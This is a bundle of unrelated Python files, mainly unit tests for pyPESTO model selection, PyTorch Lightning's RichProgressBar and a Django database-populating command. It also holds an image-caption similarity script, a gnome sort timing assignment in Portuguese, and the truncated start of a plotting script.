import pandas as pd
import petab_select
import pytest
from more_itertools import one
from petab_select import ESTIMATE, Criterion, Method, Model
import pypesto.select
import pypesto.visualize.select
from pypesto.select import model_problem
# Options sent to `pypesto.optimize.optimize.minimize`, to reduce run time.
minimize_options = {
    'n_starts': 10,
}
# Tolerances for the differences between expected and test values
# (passed as **kwargs to np.isclose / pandas assert helpers below).
tolerances = {
    'rtol': 1e-2,
    'atol': 1e-2,
}
@pytest.fixture
def petab_problem_yaml() -> Path:
    """The location of the PEtab problem YAML file (in the repo's doc examples)."""
    return (
        Path(__file__).parent.parent.parent
        / 'doc'
        / 'example'
        / 'model_selection'
        / 'example_modelSelection.yaml'
    )
@pytest.fixture
def petab_select_problem_yaml() -> Path:
    """The location of the PEtab Select problem YAML file (doc examples)."""
    return (
        Path(__file__).parent.parent.parent
        / 'doc'
        / 'example'
        / 'model_selection'
        / 'petab_select_problem.yaml'
    )
@pytest.fixture
def petab_select_problem(petab_select_problem_yaml) -> petab_select.Problem:
    """The PEtab Select problem, parsed from its YAML definition."""
    return petab_select.Problem.from_yaml(petab_select_problem_yaml)
@pytest.fixture
def pypesto_select_problem(petab_select_problem) -> pypesto.select.Problem:
    """The pyPESTO model selection problem wrapping the PEtab Select problem."""
    return pypesto.select.Problem(petab_select_problem=petab_select_problem)
@pytest.fixture
def initial_models(petab_problem_yaml) -> List[Model]:
    """Models that can be used to initialize a search.

    Both carry AIC = inf so any calibrated model will improve on them.
    """
    # Model 1: all parameters fixed at 0.
    initial_model_1 = Model(
        model_id='myModel1',
        petab_yaml=petab_problem_yaml,
        parameters={
            'k1': 0,
            'k2': 0,
            'k3': 0,
        },
        criteria={Criterion.AIC: np.inf},
    )
    # Model 2: k1 and k2 estimated, k3 fixed.
    initial_model_2 = Model(
        model_id='myModel2',
        petab_yaml=petab_problem_yaml,
        parameters={
            'k1': ESTIMATE,
            'k2': ESTIMATE,
            'k3': 0,
        },
        criteria={Criterion.AIC: np.inf},
    )
    initial_models = [initial_model_1, initial_model_2]
    return initial_models
def test_problem_select(pypesto_select_problem):
    """Test the `Problem.select` method.

    Runs two forward-selection iterations and checks the explored model
    subspaces and the best models' AIC values.
    """
    # Iteration 1 #############################################################
    best_model_1, local_history_1, _ = pypesto_select_problem.select(
        method=Method.FORWARD,
        criterion=Criterion.AIC,
        minimize_options=minimize_options,
    )
    expected_local_history_model_subspace_ids = ['M1_0']
    test_local_history_model_subspace_ids = [
        model.model_subspace_id for model in local_history_1.values()
    ]
    # The expected "forward" models were found.
    assert (
        test_local_history_model_subspace_ids
        == expected_local_history_model_subspace_ids
    )
    # NOTE(review): expected criterion values rely on the 10-start
    # optimization being reproducible within the configured tolerances.
    expected_best_model_aic = 36.97
    test_best_model_aic = best_model_1.get_criterion(Criterion.AIC)
    # The best model (only model) has its criterion value set and is the
    # expected value.
    assert np.isclose(
        [test_best_model_aic],
        [expected_best_model_aic],
        **tolerances,
    )
    # Iteration 2 #############################################################
    best_model_2, local_history_2, history_2 = pypesto_select_problem.select(
        method=Method.FORWARD,
        criterion=Criterion.AIC,
        minimize_options=minimize_options,
    )
    expected_local_history_model_subspace_ids = ['M1_1', 'M1_2', 'M1_3']
    test_local_history_model_subspace_ids = [
        model.model_subspace_id for model in local_history_2.values()
    ]
    # The expected "forward" models were found.
    assert (
        test_local_history_model_subspace_ids
        == expected_local_history_model_subspace_ids
    )
    expected_best_model_subspace_id = 'M1_3'
    test_best_model_subspace_id = best_model_2.model_subspace_id
    # The best model is as expected.
    assert test_best_model_subspace_id == expected_best_model_subspace_id
    expected_best_model_aic = -4.71
    test_best_model_aic = best_model_2.get_criterion(Criterion.AIC)
    # The best model has its criterion value set and is the
    # expected value.
    assert np.isclose(
        [test_best_model_aic],
        [expected_best_model_aic],
        **tolerances,
    )
def test_problem_select_to_completion(pypesto_select_problem):
    """Test the `Problem.select_to_completion` method.

    Runs a full forward search (greedy: first improvement accepted, restarts
    from the latest MLE) and checks the calibrated and best models.
    """
    best_models = pypesto_select_problem.select_to_completion(
        method=Method.FORWARD,
        criterion=Criterion.BIC,
        select_first_improvement=True,
        startpoint_latest_mle=True,
        minimize_options=minimize_options,
    )
    expected_history_subspace_ids = ['M1_0', 'M1_1', 'M1_4', 'M1_5', 'M1_7']
    test_history_subspace_ids = [
        model.model_subspace_id
        for model in pypesto_select_problem.history.values()
    ]
    # Expected models were calibrated during the search.
    assert test_history_subspace_ids == expected_history_subspace_ids
    expected_best_model_subspace_ids = ['M1_0', 'M1_1', 'M1_7']
    test_best_model_subspace_ids = [
        model.model_subspace_id for model in best_models
    ]
    # Expected best models were found.
    assert test_best_model_subspace_ids == expected_best_model_subspace_ids
    # NOTE(review): values depend on optimizer reproducibility within the
    # configured tolerances.
    expected_best_model_criterion_values = [36.767, -4.592, -4.889]
    test_best_model_criterion_values = [
        model.get_criterion(Criterion.BIC) for model in best_models
    ]
    # The best models have the expected criterion values.
    assert np.isclose(
        test_best_model_criterion_values,
        expected_best_model_criterion_values,
        **tolerances,
    ).all()
def test_problem_multistart_select(pypesto_select_problem, initial_models):
    """Test the `Problem.multistart_select` method.

    Starts forward selection from two predecessor models and checks the
    winning model, its criterion value, and the predecessor bookkeeping.
    """
    best_model, best_models = pypesto_select_problem.multistart_select(
        method=Method.FORWARD,
        criterion=Criterion.AIC,
        predecessor_models=initial_models,
        minimize_options=minimize_options,
    )
    expected_best_model_subspace_id = 'M1_3'
    test_best_model_subspace_id = best_model.model_subspace_id
    # The best model is as expected.
    assert test_best_model_subspace_id == expected_best_model_subspace_id
    expected_best_models_criterion_values = {
        'M1_3': -4.705,
        # 'M1_7': -4.056, # skipped -- reproducibility requires many starts
    }
    test_best_models_criterion_values = {
        model.model_subspace_id: model.get_criterion(Criterion.AIC)
        for model in best_models
        if model.model_subspace_id != 'M1_7'  # skipped, see above
    }
    # The best models are as expected and have the expected criterion values.
    pd.testing.assert_series_equal(
        pd.Series(test_best_models_criterion_values),
        pd.Series(expected_best_models_criterion_values),
        **tolerances,
    )
    initial_model_id_hash_map = {
        initial_model.model_id: initial_model.get_hash()
        for initial_model in initial_models
    }
    # Models M1_1..M1_3 descend from myModel1; M1_7 from myModel2.
    expected_predecessor_model_hashes = {
        'M1_1': initial_model_id_hash_map['myModel1'],
        'M1_2': initial_model_id_hash_map['myModel1'],
        'M1_3': initial_model_id_hash_map['myModel1'],
        'M1_7': initial_model_id_hash_map['myModel2'],
    }
    test_predecessor_model_hashes = {
        model.model_subspace_id: model.predecessor_model_hash
        for model in pypesto_select_problem.history.values()
    }
    # All calibrated models have the expected predecessor model.
    assert test_predecessor_model_hashes == expected_predecessor_model_hashes
def test_postprocessors(petab_select_problem):
    """Test model calibration postprocessors."""
    output_path = Path('output')
    output_path.mkdir(exist_ok=True, parents=True)
    save_pp = partial(
        pypesto.select.postprocessors.save_postprocessor,
        output_path=output_path,
    )
    plot_pp = partial(
        pypesto.select.postprocessors.waterfall_plot_postprocessor,
        output_path=output_path,
    )
    combined_pp = partial(
        pypesto.select.postprocessors.multi_postprocessor,
        postprocessors=[save_pp, plot_pp],
    )
    pypesto_select_problem = pypesto.select.Problem(
        petab_select_problem=petab_select_problem,
        model_postprocessor=combined_pp,
    )
    # Iteration 1 # Same as first iteration of `test_problem_select` ##########
    best_model_1, local_history_1, _ = pypesto_select_problem.select(
        method=Method.FORWARD,
        criterion=Criterion.AIC,
        minimize_options=minimize_options,
    )
    # The expected "forward" models were found.
    assert [
        model.model_subspace_id for model in local_history_1.values()
    ] == ['M1_0']
    # The best model (only model) has its criterion value set and is the
    # expected value.
    assert np.isclose(
        [best_model_1.get_criterion(Criterion.AIC)],
        [36.97],
        **tolerances,
    )
    # End Iteration 1 #########################################################
    for suffix in (".png", ".hdf5"):
        expected_file = output_path / (best_model_1.model_hash + suffix)
        # The expected file exists.
        assert expected_file.is_file()
        # Remove the expected file (also ensures it firstly exists).
        expected_file.unlink()
def test_model_problem_fake_result():
    """Test fake results for models with no estimated parameters."""
    expected_fval = 100.0
    fake_result = model_problem.create_fake_pypesto_result_from_fval(
        expected_fval
    )
    # There is only one start in the result.
    fake_start = one(fake_result.optimize_result.list)
    # The fake start has the expected fake ID.
    assert (
        fake_start.id
        == "fake_result_for_problem_with_no_estimated_parameters"
    )
    # The fake start has the expected zero estimated parameters.
    assert fake_start.x.tolist() == []
    # The fake start has the expected fval.
    assert fake_start.fval == expected_fval
def test_vis(pypesto_select_problem):
    """Test plotting routines."""
    best_models = pypesto_select_problem.select_to_completion(
        method=Method.FORWARD,
        criterion=Criterion.AIC,
        minimize_options=minimize_options,
    )
    # Both plotting entry points should run without raising.
    plot_kwargs = {'criterion': Criterion.AIC}
    pypesto.visualize.select.plot_selected_models(
        selected_models=best_models, **plot_kwargs
    )
    pypesto.visualize.select.plot_history_digraph(
        problem=pypesto_select_problem, **plot_kwargs
    )
|
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from unittest import mock
from unittest.mock import DEFAULT, Mock
import pytest
from torch.utils.data import DataLoader
from pytorch_lightning import Trainer
from pytorch_lightning.callbacks import ProgressBarBase, RichProgressBar
from pytorch_lightning.callbacks.progress.rich_progress import RichProgressBarTheme
from tests.helpers.boring_model import BoringModel, RandomDataset, RandomIterableDataset
from tests.helpers.runif import RunIf
@RunIf(rich=True)
def test_rich_progress_bar_callback():
    """A RichProgressBar callback becomes the trainer's single progress bar."""
    trainer = Trainer(callbacks=RichProgressBar())
    progress_bars = [
        cb for cb in trainer.callbacks if isinstance(cb, ProgressBarBase)
    ]
    assert len(progress_bars) == 1
    assert isinstance(trainer.progress_bar_callback, RichProgressBar)
@RunIf(rich=True)
def test_rich_progress_bar_refresh_rate_enabled():
    """A positive refresh rate enables the bar; zero disables it."""
    for refresh_rate, enabled in ((1, True), (0, False)):
        progress_bar = RichProgressBar(refresh_rate=refresh_rate)
        if enabled:
            assert progress_bar.is_enabled
            assert not progress_bar.is_disabled
        else:
            assert not progress_bar.is_enabled
            assert progress_bar.is_disabled
@RunIf(rich=True)
@mock.patch("pytorch_lightning.callbacks.progress.rich_progress.Progress.update")
@pytest.mark.parametrize("dataset", [RandomDataset(32, 64), RandomIterableDataset(32, 64)])
def test_rich_progress_bar(progress_update, tmpdir, dataset):
    """Progress.update fires for fit/validate/test/predict on both dataset styles."""

    class TestModel(BoringModel):
        # All four stages share the same single-batch dataloader.
        def _loader(self):
            return DataLoader(dataset=dataset)

        def train_dataloader(self):
            return self._loader()

        def val_dataloader(self):
            return self._loader()

        def test_dataloader(self):
            return self._loader()

        def predict_dataloader(self):
            return self._loader()

    trainer = Trainer(
        default_root_dir=tmpdir,
        num_sanity_val_steps=0,
        limit_train_batches=1,
        limit_val_batches=1,
        limit_test_batches=1,
        limit_predict_batches=1,
        max_steps=1,
        callbacks=RichProgressBar(),
    )
    model = TestModel()
    for run_stage in (trainer.fit, trainer.validate, trainer.test, trainer.predict):
        run_stage(model)
    assert progress_update.call_count == 8
def test_rich_progress_bar_import_error(monkeypatch):
    """Constructing RichProgressBar without `rich` raises ModuleNotFoundError."""
    import pytorch_lightning.callbacks.progress.rich_progress as rich_progress_module

    # Simulate `rich` being unavailable.
    monkeypatch.setattr(rich_progress_module, "_RICH_AVAILABLE", False)
    with pytest.raises(ModuleNotFoundError, match="`RichProgressBar` requires `rich` >= 10.2.2."):
        RichProgressBar()
@RunIf(rich=True)
def test_rich_progress_bar_custom_theme(tmpdir):
    """Test to ensure that custom theme styles are used."""
    with mock.patch.multiple(
        "pytorch_lightning.callbacks.progress.rich_progress",
        CustomBarColumn=DEFAULT,
        BatchesProcessedColumn=DEFAULT,
        CustomTimeColumn=DEFAULT,
        ProcessingSpeedColumn=DEFAULT,
    ) as mocks:
        theme = RichProgressBarTheme()
        progress_bar = RichProgressBar(theme=theme)
        progress_bar.on_train_start(Trainer(tmpdir), BoringModel())

        assert progress_bar.theme == theme

        # The bar column receives both complete and finished styles.
        _, bar_kwargs = mocks["CustomBarColumn"].call_args
        assert bar_kwargs["complete_style"] == theme.progress_bar
        assert bar_kwargs["finished_style"] == theme.progress_bar_finished

        # The remaining columns each receive a single style from the theme.
        for column_name, expected_style in (
            ("BatchesProcessedColumn", theme.batch_progress),
            ("CustomTimeColumn", theme.time),
            ("ProcessingSpeedColumn", theme.processing_speed),
        ):
            _, column_kwargs = mocks[column_name].call_args
            assert column_kwargs["style"] == expected_style
@RunIf(rich=True)
def test_rich_progress_bar_keyboard_interrupt(tmpdir):
    """Test to ensure that when the user keyboard interrupts, we close the progress bar."""

    class TestModel(BoringModel):
        def on_train_start(self) -> None:
            raise KeyboardInterrupt

    with mock.patch(
        "pytorch_lightning.callbacks.progress.rich_progress.Progress.stop", autospec=True
    ) as mock_progress_stop:
        trainer = Trainer(
            default_root_dir=tmpdir,
            fast_dev_run=True,
            callbacks=RichProgressBar(),
        )
        trainer.fit(TestModel())
    # The interrupt path must stop (close) the rich progress display.
    mock_progress_stop.assert_called_once()
@RunIf(rich=True)
def test_rich_progress_bar_configure_columns():
    """A subclass can replace the default progress columns via configure_columns."""
    from rich.progress import TextColumn

    custom_column = TextColumn("[progress.description]Testing Rich!")

    class CustomRichProgressBar(RichProgressBar):
        def configure_columns(self, trainer):
            return [custom_column]

    progress_bar = CustomRichProgressBar()
    progress_bar._init_progress(Mock())
    columns = progress_bar.progress.columns
    assert columns[0] == custom_column
    assert len(columns) == 2
@RunIf(rich=True)
@pytest.mark.parametrize(("leave", "reset_call_count"), ([(True, 0), (False, 5)]))
def test_rich_progress_bar_leave(tmpdir, leave, reset_call_count):
    # Calling `reset` means continuing on the same progress bar.
    with mock.patch(
        "pytorch_lightning.callbacks.progress.rich_progress.Progress.reset", autospec=True
    ) as mock_progress_reset:
        trainer = Trainer(
            default_root_dir=tmpdir,
            num_sanity_val_steps=0,
            limit_train_batches=1,
            max_epochs=6,
            callbacks=RichProgressBar(leave=leave),
        )
        trainer.fit(BoringModel())
    # leave=True keeps one bar per epoch (no resets); leave=False reuses it.
    assert mock_progress_reset.call_count == reset_call_count
@RunIf(rich=True)
@mock.patch("pytorch_lightning.callbacks.progress.rich_progress.Progress.update")
@pytest.mark.parametrize(("refresh_rate", "expected_call_count"), ([(0, 0), (3, 7)]))
def test_rich_progress_bar_refresh_rate(progress_update, tmpdir, refresh_rate, expected_call_count):
    """The number of Progress.update calls depends on the configured refresh rate."""
    trainer = Trainer(
        default_root_dir=tmpdir,
        num_sanity_val_steps=0,
        limit_train_batches=6,
        limit_val_batches=6,
        max_epochs=1,
        callbacks=RichProgressBar(refresh_rate=refresh_rate),
    )
    trainer.fit(BoringModel())
    assert progress_update.call_count == expected_call_count
@RunIf(rich=True)
@pytest.mark.parametrize("limit_val_batches", (1, 5))
def test_rich_progress_bar_num_sanity_val_steps(tmpdir, limit_val_batches: int):
    """The sanity-check task completes min(num_sanity_val_steps, limit_val_batches) batches."""
    num_sanity_val_steps = 3
    progress_bar = RichProgressBar()
    trainer = Trainer(
        default_root_dir=tmpdir,
        num_sanity_val_steps=num_sanity_val_steps,
        limit_train_batches=1,
        limit_val_batches=limit_val_batches,
        max_epochs=1,
        callbacks=progress_bar,
    )
    trainer.fit(BoringModel())
    expected_completed = min(num_sanity_val_steps, limit_val_batches)
    assert progress_bar.progress.tasks[0].completed == expected_completed
|
import os
import re
import argparse
import torch
from PIL import Image
from torchvision import transforms
from mmcv import Config
from mmcv.runner import load_checkpoint, save_checkpoint
from model import Model
def get_parameter():
    """Parse and validate the command-line arguments.

    Returns:
        argparse.Namespace where `filename` defaults to the image's base name
        (without extension) and `caption` is normalized to a list of caption
        strings: read line-by-line from a file if the value is an existing
        path, otherwise split on ';'.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("--config", type=str, default="configs/baseline.py")
    parser.add_argument("--checkpoint", type=str, default="checkpoint.pth")
    parser.add_argument("--device", type=str, default="cpu")
    parser.add_argument("--image", type=str, default="example/Barack Obama by Gage Skidmore.png")
    parser.add_argument("--filename", type=str, default=None)
    parser.add_argument("--caption", type=str, default="example/captions.txt")
    args = parser.parse_args()
    assert os.path.exists(args.config), f"{args.config} does not exists!"
    assert os.path.exists(args.image), f"{args.image} does not exists!"
    if args.filename is None:
        # Use the image base name without its extension as the identifier.
        # os.path.basename/splitext also handle a bare filename with no
        # directory separator, where `rsplit(os.sep, 1)[1]` raised IndexError.
        args.filename = os.path.splitext(os.path.basename(args.image))[0]
    if args.caption is None:
        raise ValueError('`--caption` should be either caption or path.')
    elif os.path.exists(args.caption):
        with open(args.caption, 'r') as f:
            args.caption = f.readlines()
    else:
        args.caption = args.caption.split(';')
    return args
def expand_to_three_channel(ts, size=224):
    """Return a 3-channel float tensor of shape (3, size, size).

    Grayscale-plus-alpha input (2 channels) drops the alpha plane first;
    inputs with more than 3 channels (e.g. RGBA) keep only the first 3.
    """
    # Two channels means luminance + alpha: keep only the luminance plane.
    channels = ts[:1] if ts.size(0) == 2 else ts
    return channels[:3].float().expand(3, size, size)
# Preprocessing pipeline: resize/center-crop to 224x224, convert to a tensor,
# force exactly 3 channels, and normalize with the standard ImageNet
# channel statistics.
transform = transforms.Compose([
    transforms.Resize(256),
    transforms.CenterCrop(224),
    transforms.ToTensor(),
    # Handles grayscale / alpha inputs via expand_to_three_channel above.
    transforms.Lambda(expand_to_three_channel),
    transforms.Normalize(mean=[0.485, 0.456, 0.406],
                         std=[0.229, 0.224, 0.225]),
])
def load_image(image: str):
    """Open `image` from disk and return the preprocessed tensor.

    Uses a context manager so the file handle is released even if the
    transform raises; the previous `hasattr(img_pil, "close")` pattern
    leaked the handle on transform errors.
    """
    with Image.open(image) as img_pil:
        return transform(img_pil)
def process_caption(caption: str):
    """Normalize a raw caption: ' [SEP]' becomes '.', whitespace is collapsed."""
    without_sep = re.sub(r" \[SEP\]", r".", caption)
    return re.sub(r" +", r" ", without_sep.strip())
def compute_similarity(model,
                       image: torch.FloatTensor,
                       filename: str,
                       caption: list):
    """Return the cosine similarity between one image and each caption."""
    # The model expects a batched image tensor.
    batched_image = image.unsqueeze(0) if image.ndim == 3 else image
    with torch.no_grad():
        image_features = model.forward(batched_image, [filename]).cpu()
        caption_features = model.forward(caption).cpu()
    return torch.nn.functional.cosine_similarity(
        image_features, caption_features, dim=1)
def inference(args):
    """Run image-caption similarity scoring for the parsed CLI arguments."""
    cfg = Config.fromfile(args.config)
    cfg.device = args.device
    # init model
    model = Model(device=cfg.device, **cfg.model).to(cfg.device)
    if args.checkpoint:
        load_checkpoint(model, args.checkpoint)
    model.eval()
    # load data
    image = load_image(args.image)
    captions = [process_caption(raw) for raw in args.caption]
    # compute similarity
    similarity = compute_similarity(model, image, args.filename, captions)
    # display
    for caption, score in zip(args.caption, similarity):
        print(f"similarity: {score:.4f} || {caption}")
# Script entry point: parse CLI arguments, then score the image against the captions.
if __name__ == "__main__":
    inference(get_parameter())
|
#Class used for transfering lines to the write classes. Ex var assignments go to class Var
import Variable
import Objects
def init():
    """Initialize module state; call once before any `process` calls."""
    # Delegates to the Objects module's own initializer.
    Objects.init()
def process(string):
    """Route one source line to its handler.

    Lines starting with '@' are variable assignments handled by `Variable`;
    any other non-empty, non-newline line goes to `Objects`.
    """
    # Skip blank lines first. The original condition
    # `string[0] != "" or string[0] != "\n"` was always true (an `or` of two
    # inequalities against different values), and `string[0]` raised
    # IndexError for an empty string.
    if not string or string == "\n":
        return
    if string[0] == "@":
        Variable.process(string)
    else:
        Objects.process(string)
|
#ATIVIDADE PEDIDA: (Prof.Ronaldo)####################################################################################################################################################{
#CT0111 – Décima primeira da primeira etapa
#Implementar o Gnome sort e imprimir os graficos conforme segue:
#
# *Tamanho da lista de números x Tempo para ordenar pelo método - OBRIGATÓRIO!
# [Tamanho da lista x Quantidade de operações (Número de comparações)] - OPCIONAL!
#
#As listas geradas devem ser de números aleatórios dos seguintes tamanhos: 100K, 200K, 400K, 500K, 1M, 2M. <-Devido ao algoritmo ter-se mostrado EXTREMAMENTE LENTO PARA O CASO DA LISTA RANDOMICA, A LISTA FOI DIMINUÍDA PARA ENTRADAS DE VALOR MENOR! #
#####################################################################################################################################################################################}
#"Importação das devidas bibliotecas ;)"
import sys
import math
import random
from random import randint
import timeit
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
###############################################################################{
#"Declarações iniciais..."
mpl.use('Agg')  # non-interactive backend; NOTE(review): called after pyplot is imported, so it may warn or have no effect -- confirm
mpl.rc('axes', linewidth=2)  # thicker axes frame for all generated figures
plt.style.use('_classic_test')  # classic test style sheet (deprecated name in newer matplotlib releases)
sys.setrecursionlimit(10**9)  # very high recursion limit; gnomeSort below is iterative, so presumably precautionary
###############################################################################}
#"Segunda Função responsável pela criação do gráfico(x,y) para estudo do desempenho de algoritmo" *(Usada para criar o gráfico dos 3 casos apresentados juntos na mesma malha)
#Implementação do professor + implementação do aluno####################################################################################################{
def desenhaGrafico2(x, y, yde, yce, file_name, label, label2, label3, file_title, line_color, line_color2, line_color3, line_color4, line_color5, line_color6, xl, yl): #
    """Draw three curves (random / descending / ascending inputs) on one grid.

    x: list of input sizes; y / yde / yce: the corresponding measurements for
    the random, descending and ascending cases. The figure is written to
    `file_name`. Assumes x, y, yde, yce each have at least 6 entries (the
    scatter markers highlight index 5).
    """
    fig = plt.figure(figsize=(20, 20))
    ax = fig.add_subplot(111)
    # One line per input ordering, with decreasing line width for layering.
    ax.plot(x,y, color=line_color,linestyle = '-',linewidth=3,label = label)
    ax.plot(x,yde, color=line_color3,linestyle = '-',linewidth=2,label = label2)
    ax.plot(x,yce, color=line_color5,linestyle = '-',linewidth=1,label = label3)
    # Highlight the 6th data point of each curve with a shape outline plus an 'x'.
    plt.scatter(x[5],y[5], s=800,marker='s',facecolor='none',edgecolors= line_color, linewidths=1.5)
    plt.scatter(x[5],y[5], s=200,marker='x',facecolor=line_color2,edgecolors= line_color, linewidths=3)
    plt.scatter(x[5],yde[5], s=800,marker='o',facecolor='none',edgecolors= line_color3, linewidths=1.5)
    plt.scatter(x[5],yde[5], s=200,marker='x',facecolor=line_color4,edgecolors= line_color3, linewidths=3)
    plt.scatter(x[5],yce[5], s=800,marker='^',facecolor='none',edgecolors= line_color5, linewidths=1.5)
    plt.scatter(x[5],yce[5], s=200,marker='x',facecolor=line_color6,edgecolors= line_color5, linewidths=3)
    # Place the legend relative to the whole figure, outside the axes.
    ax.legend(bbox_to_anchor=(1, 1),bbox_transform=plt.gcf().transFigure)
    plt.ylabel(yl)
    plt.xlabel(xl)
    plt.title(file_title)
    fig.savefig(file_name)
########################################################################################################################################################}
#"Função Gnome Sort"
#Implementação do aluno#########################################################################{
def gnomeSort(lista):
    """Sort `lista` in place with gnome sort; return the number of swaps."""
    trocas = 0
    pos = 0
    ultimo = len(lista) - 1
    while pos < ultimo:
        atual, proximo = lista[pos], lista[pos + 1]
        if atual > proximo:
            lista[pos], lista[pos + 1] = proximo, atual
            trocas += 1
            # After a swap, step back to re-check the previous pair.
            if pos > 0:
                pos -= 1
                continue
        pos += 1
    return trocas
################################################################################################}
#"Função que ordena um número determinado(em função da entrada) de valores gerados aleatoriamente ou em certa ordem específica(Para essa DÉCIMA PRIMEIRA ATIVIDADE será em ordem ALEATÓRIA) e retorna os devidos gráficos comparativos"
#O que estiver comentado no código da função abaixo foi usado para gerar os outros gráficos(Para os casos da lista ser DECRESCENTE ou CRESCENTE, os quais o aluno decidiu fazer apenas para fins acadêmicos).
#Implementação do aluno##########################################################################################################################################################################################################################################################################################################################################{
def cria_Graficos(lista_entrada): #
    """For each input size, time gnome sort and count swaps for random,
    descending and ascending lists, then render the two comparison plots.

    Note: each timeit call embeds the list literal in the timed statement, so
    the timing includes parsing/building that literal inside timeit's scope;
    the local `lista` is then sorted again just to count swaps.
    """
    tempos_orden_Random = list()
    tempos_orden_Decresc = list()
    tempos_orden_Cresc = list()
    num_iteracoes_Random = list()
    num_iteracoes_Decresc = list()
    num_iteracoes_Cresc = list()
    j = 0
    for i in lista_entrada:
        #1) Random list <- REQUIRED (requested by the assignment)
        lista = list(range(0, i + 1))
        random.shuffle(lista)
        tempos_orden_Random.append(timeit.timeit("gnomeSort({})".format(lista),setup="from __main__ import gnomeSort",number=1))
        num_iteracoes_Random.append(gnomeSort(lista))
        #2) List already sorted in DESCENDING order <- OPTIONAL (student's own demonstration)
        lista = list(range(i,-1,-1))
        tempos_orden_Decresc.append(timeit.timeit("gnomeSort({})".format(lista),setup="from __main__ import gnomeSort",number=1))
        num_iteracoes_Decresc.append(gnomeSort(lista))
        # #
        #3) List already sorted in ASCENDING order <- OPTIONAL (student's own demonstration)
        lista = list(range(0,i+1,1))
        tempos_orden_Cresc.append(timeit.timeit("gnomeSort({})".format(lista),setup="from __main__ import gnomeSort",number=1))
        num_iteracoes_Cresc.append(gnomeSort(lista))
        j += 1
        print(">>>[",j,"]\n")#Progress marker: confirms each element of "lista_teste" is being processed.
    print(">>>Passou!\n")
    desenhaGrafico2(lista_entrada,tempos_orden_Random,tempos_orden_Decresc,tempos_orden_Cresc,"GraficoGnomeSort(Tamanho_Lista-X-Tempo_Ordenacoes).png", "Tempo(Lista->Aleatória[Gnome Sort])","Tempo(Lista->Decrescente[Gnome Sort])","Tempo(Lista->Crescente[Gnome Sort])",'(Gnome Sort - Listas: Aleatória/Decrescente/Crescente)Tamanho_Lista X Tempo_Ordenacoes','magenta','darkmagenta','cyan','darkcyan','red','darkred',"<Entradas/>","<Tempo-Saída/>") #
    desenhaGrafico2(lista_entrada,num_iteracoes_Random,num_iteracoes_Decresc,num_iteracoes_Cresc,"GraficoGnomeSort(Tamanho_Lista-X-Numero_Iteracoes).png", "SWAPS(Lista->Aleatória[Gnome Sort])","SWAPS(Lista->Decrescente[Gnome Sort])","SWAPS(Lista->Crescente[Gnome Sort])",'(Gnome Sort - Listas: Aleatória/Decrescente/Crescente)Tamanho_Lista X SWAPS','magenta','darkmagenta','cyan','darkcyan','red','darkred',"<Entradas/>","<Tempo-Saída/>") #
###################################################################################################################################################################################################################################################################################################################################################################}
#Inicialização da aplicação:
##########################################################################{
#lista_teste = [100000,200000,400000,500000,1000000,2000000]<-Para se ter ideia, levou mais de 1 Dia para rodar essa entrada no "Google Colabs" e ainda não havia compilado nem 4/6 do total direito!"
#################################################################################################
#Obs:.Essa foi a entrada que levou o menor TEMPO para mim,detalhe que ainda levou algumas horas!#
# Benchmark input sizes (reduced from the assignment's 100K-2M; see notes above).
lista_teste = [1000,2000,3000,4000,5000,10000] #
#################################################################################################
cria_Graficos(lista_teste)
##########################################################################}
#############################
################
|
from django.apps import apps
from django.test import TestCase
from django.core.management import call_command
class PopulateDbtTests(TestCase):
    """Test Module for commands that populate db for prototype"""

    def setUp(self):
        # Populate the database before every test case.
        call_command('populate_db')

    @staticmethod
    def _objects(model_name):
        """Return the default manager of the given `core` app model."""
        return apps.get_model('core', model_name).objects

    def test_populate_institute(self):
        """Test whether institute model count is correct and test accuracy
        by checking for one particular entry"""
        manager = self._objects('Institute')
        self.assertTrue(manager.filter(name="Engineering"))
        self.assertEqual(manager.count(), 3)

    def test_populate_field_of_studies(self):
        """Test whether field of studies model count is correct and test accuracy
        by checking for one particular entry"""
        manager = self._objects('FieldOfStudies')
        self.assertTrue(manager.filter(name="Informatics"))
        self.assertEqual(manager.count(), 7)

    def test_populate_user(self):
        """Test whether user model count is correct and test accuracy
        by checking for one particular entry"""
        manager = self._objects('User')
        self.assertTrue(manager.filter(name="John Wayne", is_student=True))
        self.assertEqual(manager.count(), 47)

    def test_populate_student(self):
        """Test whether student model count is correct and test accuracy
        by checking for one particular entry"""
        manager = self._objects('Student')
        self.assertTrue(manager.filter(user__email="john.wayne.student@htw.com"))
        self.assertEqual(manager.count(), 20)

    def test_populate_professor(self):
        """Test whether professor model count is correct and test accuracy
        by checking for one particular entry"""
        manager = self._objects('Professor')
        self.assertTrue(manager.filter(user__email="ana.summer.professor@htw.com"))
        self.assertEqual(manager.count(), 27)

    def test_populate_course(self):
        """Test whether seminar model count is correct and test accuracy
        by checking for one particular entry"""
        manager = self._objects('Course')
        self.assertTrue(manager.filter(name="Arabic literature in the Middle Ages "))
        self.assertEqual(manager.count(), 23)

    def test_add_courses_added_to_student(self):
        """Test whether courses are correctly added to student
        by checking for one particular entry and count of student's courses"""
        student = self._objects('Student').get(user__email="john.wayne.student@htw.com")
        self.assertEqual(student.course_set.count(), 6)
|
import os
import cv2
import glob
import torch
import pathlib
import argparse
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1 import make_axes_locatable
matplotlib.use('Agg')
from utils.dataset import create_images_dict
labels = {"all": "vanilla fine-tuning",
"encoder": "encoder adaptation",
"modulator": "modulator adaptation"}
labels_ckpt = {
'GT': 'groundtruth',
'INDG': 'in-domain generalization',
'OODG': 'out-of-domain generalization',
'FT': 'full finetuning',
'ET': 'encoder finetuning'
}
colors = {
'OODG': 'tab:blue', 'FT': 'tab:orange', 'ET': 'tab:red',
'diff_OODG_FT': 'tab:orange', 'diff_OODG_ET': 'tab:red'}
def create_few_shot_plot(results_dir, out_dir, fontsize=16):
    """Aggregate per-seed ADE results and plot ADE vs. number of batches.

    Expects `results_dir` laid out as
    `<results_dir>/<update_mode>/<seed>/<num>.csv`, where each CSV holds a
    single ADE value and `<num>` is the number of adaptation batches.
